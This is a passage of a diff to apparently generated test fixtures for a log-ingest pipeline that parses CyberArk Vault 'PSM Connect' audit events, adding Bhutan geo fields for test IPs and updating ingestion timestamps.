\u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:50:43\",\"IsoTimestamp\":\"2021-03-14T13:50:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM 
Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -988,17 +1078,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1076,7 +1184,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331182700Z", + "ingested": "2021-12-14T14:42:12.780170141Z", "original": "\u003c5\u003e1 2021-03-15T10:31:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:31:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:31:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:31:56\",\"IsoTimestamp\":\"2021-03-15T10:31:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM 
Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -1100,17 +1208,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1188,7 +1314,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331187900Z", + "ingested": "2021-12-14T14:42:12.780170529Z", "original": "\u003c5\u003e1 2021-03-15T10:33:39Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:39\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:39Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:39\",\"IsoTimestamp\":\"2021-03-15T10:33:39Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM 
Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -1212,17 +1338,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1300,7 +1444,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331193100Z", + "ingested": "2021-12-14T14:42:12.780171073Z", "original": "\u003c5\u003e1 2021-03-15T10:35:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:35:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:35:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:35:00\",\"IsoTimestamp\":\"2021-03-15T10:35:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM 
Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -1324,17 +1468,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1408,7 +1570,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331199Z", + "ingested": "2021-12-14T14:42:12.780171463Z", "original": "\u003c5\u003e1 2021-03-15T13:18:31Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:31\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:31Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:31\",\"IsoTimestamp\":\"2021-03-15T13:18:31Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", 
@@ -1432,17 +1594,35 @@
 }
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "address": "67.43.156.15",
 "user": {
 "name": "adrian"
 },
- "address": "67.43.156.15",
 "ip": "67.43.156.15"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "address": "67.43.156.13",
 "user": {
 "name": "Administrator"
 },
- "address": "67.43.156.13",
 "ip": "67.43.156.13"
 },
 "tags": [
@@ -1516,7 +1696,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331203Z", + "ingested": "2021-12-14T14:42:12.780171857Z", "original": "\u003c5\u003e1 2021-03-15T14:08:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
